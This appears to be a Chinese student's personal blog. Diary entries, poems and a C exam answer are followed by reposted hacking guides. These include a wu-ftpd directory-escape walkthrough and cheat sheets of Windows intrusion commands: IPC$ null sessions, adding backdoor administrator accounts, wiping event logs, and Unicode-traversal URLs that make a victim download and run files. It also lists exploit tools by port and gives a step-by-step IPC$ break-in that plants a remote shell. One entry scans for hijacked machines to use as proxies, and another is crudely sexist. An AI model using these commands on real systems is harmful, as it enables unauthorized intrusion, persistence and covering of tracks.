身在高三

                    得到的,已经忘记。
                    失去的,追悔不已。
                    留恋过去,有何意义。
                    抛弃过去,如何面对自己。
                    空空时光,空空而过。
                    高三生活,也只如此。
 
                    本以为充实、忙碌,可补汝心。
                    然空虚无助,步步紧逼。
                    看风景依然,丑陋掩于落叶之下。
                    看庸俗世事,千篇一律。
                    偶有变化,也难离其中。
                    幸福,论为何物?
                    比之流行、黑洞,何如?
                   
                    身在高三,身不由己!
                    看未来,空空如也。
                    观现在,眼界太小。
                    望过去,无例可循。
                    心是自由的,笔是自由的,我却不自由!

    不知这算不算做围城?反正我是出不去。就等别人冲进来吧!
    近日连遭打击,先是奥赛报名名单被送丢,再是语文成绩被书写分控制。真是烦人,我都连续5早上迟到了。好累!关键是累了没价值。呜呜!我的奥赛。

计算机等级考试

    9月24日是今年的计算机等级考试的第二天,我们学校就是本地区的等级考试考点!学校的很多学生都参加了计算机等级考试。
    昨天考了笔试,今天我什么都不担心!第一堂的上机考试,5分钟就完卷了!是不是很棒!哎,可怕的后面总是伴随着可怜。我用5分钟做完的那道题,最多就得60分!我太大意了,3个答案:我只将前两个答案做正确了!看下面的题吧,好后悔哦。那么早做完了就在逍遥!后悔莫及啊!
    我的答案做成了这样!

#include <stdio.h>
#define  N 200
int cnt1, cnt2, xx[N] ;
float pj ; /* 平均值 */

void jsValue()
{int i,k=0;
float k1=0;
cnt1=0;cnt2=0;
for(i=0;i<200;i++)
{if(xx[i]%2==1) {cnt1++;k=k++;k1=k1+xx[i];}
else if(xx[i]%2==0) cnt2++;
}
pj=k1/k*1.0;

}

void read_dat(int xx[N])
{
  int i,j ;
  FILE *fp ;

  fp = fopen("K:\\g38\\35000104\\in.dat","r") ;
  for(i = 0 ; i < 20 ; i++) {
    for(j = 0 ; j < 10 ; j++) {
      fscanf(fp, "%d,", &xx[i*10+j]) ;
      printf("%d ", xx[i*10+j]) ;
    }
    printf("\n");
  }
  fclose(fp);
}

void main()
{
   read_dat(xx) ;
   jsValue() ;
   printf("\n\ncnt1=%d,cnt2=%d,pj=%6.2f\n", cnt1, cnt2, pj) ;
   writeDat() ;
}

writeDat()
{
  FILE *fw ;

  fw = fopen("K:\\g38\\35000104\\out.dat","w") ;
  fprintf(fw, "%d\n%d\n%6.2f\n", cnt1, cnt2, pj) ;
  fclose(fw) ;
}

后悔呀!

梦境

    现在不知道该写什么,不知道上网定的时间到了没!现在是10:27,我还没有晚饭.废话不说,先到"网站源码下载中心 "下在几个VB的原码软件!

   都是些小程序,下了以后在学校也没有时间看!真不知道什么时候才能学自己想学的东西,考试真的好烦.中国教育除去考试,一定没有任何权威性.否则怎么这么爱考!

   其实具体说来,考试并不是中国现行教育的弊端.只因曾经的科举考试灭掉了贵族与普通民众之间的差别,减轻的民与皇权的争夺,所以科举才一味的横行到现在.唯可惜的是现在的考试以不能得到封建时期的官职和金钱,同学的们虽然还是在含窗苦读,但很多人以不满足做几年的书呆子,因为他们在当今社会的发展中看到机遇.这是任何考试都不能考的东西!只要他们把握住这些稍纵既逝的机遇,财富、地位、名誉全都不在是人们渴望的东西,这一切都将成为野心与奋斗的记过!

   走自己的路,让别人去说.每一次失败就是一次成功.每一次成功都是一个新的开始.未来在向我们展开胸怀,惟有把握.明天的胜利就如今夜的梦境,要让梦成为现实,惟有马上从梦中醒来!

诗写高三

                       

                        漫卷香帘惜风雨,
                 
                        犹抱晨暮恨至多.

                        此生难得奋斗时,
 
                        莫让毕业成蹉跎.

            如果每次关窗帘时,都有这样的感想就好了!

教师节

    今天是教师节,作为高三的学生也是我们难得的休息日!
    下午一点我就到了网吧,可惜我这来得并不算早!在我跑遍4家网吧后,找到了一台连QQ都无法正常登陆的机器!幸好我还有DOS下的QQ版本。在DOS下上了半小时QQ后,我实在无法忍耐了!退钱,换网吧!
    我在第二家网吧等了1个小时,等到了一台算是很好的机器。我下载了一些常用的找肉鸡的扫描工具。不,应该是先用半小时设置机器!这样我才能很好找几个肉鸡做代理。16时整,我后面一个人撂了一下我的肩膀,问我在做什么!还附带了一句话“不要以为自己懂点东西就胡来。”我当时很想发火!但我忍住了。我没必要发火,在我看到那人用我的鼠标点击“远程桌面连接”的时候我就全明白了!其实什么都不懂的人是他。我犯不着跟一个这样的人浪费时间!
    16:30我放弃了找肉鸡的计划,关掉了所有的扫描器。开始写博客。

    祝所有的老师们节日快乐!我爱你们!爱着中国的未来和你们手中中国的未来!

黑暗世界

                       这世界只有两种人!
                       男人,女人!
                       男人分两种,色狼,和尚.
                       女人也分两种,免费,付费.
                       妓女,庸姿俗粉,床上的极品!
                       嫖客,嫖天下之美女,看天下之裸体!
                       这世界太黑暗!
                       一个字总结!

                       钱,万能的工具!
                       吾们今生都得为它奋斗!

FTP入侵

正文

利用伺服程式的缺陷入侵系统

  FTP入侵:wu-ftpd2.x版以前安全缺陷。
  wu-ftpd2.x是WashingtonUniversity(美国华盛顿大学)所研发出来的FTP伺服程式,广泛应用在各型UNIX主机上作为FTP伺服程式。它可以接受一般的用户签入,也提供以Anonymous或ftp为名的匿名签入以开放主机上的档案供大众Download用。其2.2版本以前有一个很严重的安全缺陷:一个匿名的使用者经由下列程序也可以取得一般使用者的权限进入系统磁碟:
  1.以任何一个FTPClient端程式连线到使用wu-ftpd2.x版以前架设的FTP站台。
  2.要求签入时,使用匿名帐号签入,但不要使用anonymous而使用FTP。
  3.在根目录下再次使用chdi/(cd/)命令,即可切换到一般系统目录而不只是公众目录。现在在此示范如何入侵网络上的一台please.hack.me主机,实例如下:(中文部分为注解)
  linux1:~#ftpplease.hack.me
  Connectedtoplease.hack.me
  220hackFTPserver(Versionwu-2.x(x)SunMay14:57:12CDT1993)ready.
  Name(linux1.twunix.org:root):ftp
  331Guestloginok,sendyourcompleteemailaddressaspassword.
  Password:
  230-Welcome,archiveuser!ThisisanexperimentalFTPserver.Ifhaveany
  230-unusualproblems,pleasereporthemviaemailtoroot@please
  230-Ifyoudohaveproblems,pleasetryusingadash(-)asthefirstcharacter
  230-ofyourpassword-thiswillturnoffthecontinuationmessagesthatmay
  230-beconfusingyourftpclient.
  230-
  230Guestloginok,accessrestrictionsapply.
  RemotesystemtypeisUNIX.
  Usingbinarymodetotransferfiles.
  ftp>ls-1一般匿名帐号进入后,先查看所在目录的内容。
  200PORTcommandsuccessful.
  150OpeningASCIImodedataconnectionfor/bin/ls.
  tota19
  drwxrwxr-x8rootwheel1024Sep1109:31.
  drwxrwxr-x8rootwheel1024Sep1109:31..
  drwxrwxr-x2rootwheel1024Sep1109:31bin
  drwxrwxr-x2rootwheel1024Sep1109:31etc
  drwxrwxr-x2rootwheel1024Dec31993incoming
  drwxrwxr-x2rootwheel1024Nov171993lib
  drwxrwxr-x2rootwheel1024Sep1109:31pub
  drwxrwxr-x3rootwheel1024Sep1109:31usr
  -rw-r–r–1rootroot312Aug11994welcome.msg
  226Transfercomplete.以一般匿名帐号进入后只能看到公众目录内容。
  ftp>pwd
  257"/"iscurrentdirectory.
  ftp>cd/虽然已经在根目录下,依然再次切换到/目录。
  250CWDcommandsuccessful.本来应该是要回应[无此目录]的(因为已经在最底层)但是依然可以继续切换。
  ftp>ls-1再次查验现在目录内容。
  200PORTcommandsuccessful.
  150OpeningASCIImodedataconnectionfor/bin/ls.
  total777
  drwxr-xr-x19rootroot1024ct608:58.
  drwxr-xr-x19rootroot1024ct608:58..
  drwxr-xr-x2rootbin2048Sep1117:31bin
  drwxr-xr-x2rootroot1024Sep1117:35boot
  drwxr-xr-x3rootroot2048Oct1400:03dev
  drwxr-xr-x9rootroot2048Oct1410:41etc
  drwxr-xr-x3rootroot1024Oct507:26ext
  drwxr-xr-x2rootroot1024Sep1109:42floppy
  drwxr-xr-x8rootroot1024Oct1111:52home
  drwxr-xr-x3rootroot1024Sep1117:27lib
  drwxr-xr-x2rootroot12288Sep1117:16lost+found
  drwxr-xr-x2rootroot1024Jul1013:23mnt
  dr-xr-xr-x5rootroot1408Oct408:03proc
  -rw——-1rootroot139424Sep2817:00quota.user
  drwxr-x-x3rootroot1024Sep2814:07root
  drwxr-xr-x2rootbin2048Sep1117:31sbin
  drwxr-xr-x2rootroot1024Sep1117:18shlib
  drwxrwxrwt3rootroot1024Oct1410:40tmp
  drwxr-xr-x24rootroot1024Jul81994usr
  drwxr-xr-x14rootroot1024Sep1117:32var
  -r———1rootroot596263Sep1117:33vmlinuz
  226Transfercomplete.已经变成一般系统目录了。
  ftp>
 
入侵原理解说:
  此一入侵是利用FTP公众匿名帐号anonymous,ftp其中后者的ftp正好与系统内定的FTP公众帐号名称相同,使得系统误以为ftp是一个已经登记的用户,而不是一个公众匿名帐号,而使其进入系统目录中。
  为什么会有这种现象发生呢?原来是FTP伺服程式将连线进来是使用者分为[匿名帐号]与[正式帐号]。如果是匿名帐号,则系统仅要求其输入自己的E-mail或是Ident资料当密码,就可以进入系统的/home/ftp目录中,而以/home/ftp当作此类使用者的根目录,这种用anonymous或是ftp当帐号匿名签入的使用者是没有办法切到系统目录中的(实际的/目录),再怎么下chdir/命令也只能到/home/ftp为止。
  而如果在/etc/password中登记有案的帐号,则以系统中实际的/为其根目录,此类使用者可以在其权限范围内浏览整个硬碟。
  而因为匿名帐号是以/home/ftp目录为起点,正好与ftp此一匿名帐号相同,故wu-ftpd2.x版以前的版本将会使用ftp签入的帐号视为一般User。(不过如果是用anonymous此一匿名帐号签入,就不会有这种情况了)
  使用ftp帐号并入侵到系统里面以后有什么好处呢?由于该入侵者已经可以完整浏览该硬碟,并享有一般User的权限,当然入侵者也可以进到/etc目录下,并读取passwd档案。如果该系统没有做shadow的话,那就大大方方地拿走passwd档案,然后回家利用类密码分析程式算出密码来。如果正好还破出root的密码的话,那就……嘿嘿~~~~
 
入侵防治方法:

  1.如果您的ftp伺服程式是wu-ftpd而且版本号低于2.4版,请尽快换到2.4版使用。
  2.将ftp帐号列入/ftp/ftpusers档案中,让匿名使用者只能利用anonymous此一匿名帐号签入。
  3.替系统安装ShadowPasswd。
  4.再次确认系统中没有叫做ftp或是anonymous的目录。
  5.改/etc/inetd.conf档案,关闭FTP服务。

网管和黑客都应知道的命令

网管和黑客都应知道的命令


  (与远程主机建立空管连接) net use file://IP/地址\ipc$ "" /use:""
  (以管理员身份登录远程主机) net use file://IP/地址\ipc$ "密码" /use:"Administrator"
  (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 file://IP/地址\admin$
  (查看远程主机时间) net time file://IP/地址
  (定时启动某个程序) at file://IP/地址 02:18 readme.exe
  (查看共享) net view file://IP/地址
  (查看netbios工作组列表) nbtsta* -* **地址
  (将远程主机C盘映射为自己的F盘) net use f: file://IP/地址\c$ ""/user:"Administrator"
  (这两条把自己增加到管理员组): net user 用户名 密码 /add
  net localgroup Administrators 用户名 /add
  (断开连接) net use file://IP/地址\ipc$ /delete
  扫尾:
  del C:\winnt\system32\logfiles\*.*
  del C:\winnt\ssytem32\config\*.evt
  del C:\winnt\system32\dtclog\*.*
  del C:\winnt\system32\*.log
  del C:\winnt\system32\*.txt
  del C:\winnt\*.txt
  del C:\winnt\*.log
  一、netsvc.exe
  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
  netsvc /list file://IP/地址
  netsvc schedule file://IP/地址 /query
  netsvc file://IP/地址 schedule /start
  二、OpenTelnet.exe
  远程启动主机的Telnet服务,并绑定端口到7878,例如:
  OpenTelnet file://IP/地址 用户名 密码 1 7878
  然后就可以telnet到主机的7878端口,进入DOS方式下:
  telnet IP地址 7878     三、winshell.exe
  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CM*>后,可打下面的命令:
  * *ath (查看winshell主程序的路径信息)
  b reBoot (重新启动机器)
  d shutDown (关闭机器)
  s Shell (执行后你就会看到可爱的“C:\>”)
  x eXit (退出本次登录会话,此命令并不终止winshell的运行)
  CMD> http://…/srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
  四、3389登陆器,GUI方式登录远程主机的
  五、elsave.exe
  事件日志清除工具
  elsave -s file://IP/地址 -l "application" -C
  elsave -s file://IP/地址 -l "system" -C
  elsave -s file://IP/地址 -l "security" -C
  执行后成功清除应用程序日志,系统日志,安全日志
  六、hbulot.exe
  开启win2kserver和winxp的3389服务
  hbulot [/r]
  使用/r表示安装完成后自动重起目标使设置生效。
  七、nc.exe(netcat.exe)
  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
  想要连接到某处: nc [-options] hostname port[s] [ports] …
  绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
  参数:
  -e prog 程序重定向,一旦连接,就执行 [危险!!]
  -g gateway source-routing hop point[s], up to 8
  -G num source-routing pointer: 4, 8, 12, …
  -h 帮助信息
  -i secs 延时的间隔
  -l 监听模式,用于入站连接
  -n 指定数字的IP地址,不能用hostname
  -o file 记录16进制的传输
  -p port 本地端口号
  -r 任意指定本地及远程端口
  -s addr 本地源地址
  -u UDP模式
  -v 详细输出——用两个-v可得到更详细的内容
  -w secs timeout的时间
  -z 将输入输出关掉——用于扫描时 八、TFTPD32.EXE
  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
  http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
  然后可以直接令文件运行:
  http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名     九、prihack.exe是IIS的printer远程缓冲区溢出工具。
  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
  一○、nti*.**e、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
  一、一 Xscan命令行运行参数说明:
  在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。
  1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
  xscan -file <主机列表文件名> <检测项目> [其他选项]
  其中<检测项目> 含义如下:
  -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
  -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
  -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
  -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
  -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
  [其他选项] 含义如下:
  -v: 显示详细扫描进度
  -p: 跳过Ping不通的主机
  -o: 跳过没有检测到开放端口的主机
  -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10

常见端口入侵

各种常见端口入侵

SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
=============================
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(小榕的注入软件)。

5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
======================================
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口
用real554.exe入侵。

7. 6129端口
用DameWare6129.exe入侵。

8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。

9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
  
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
  
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
  
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
  
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
  
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)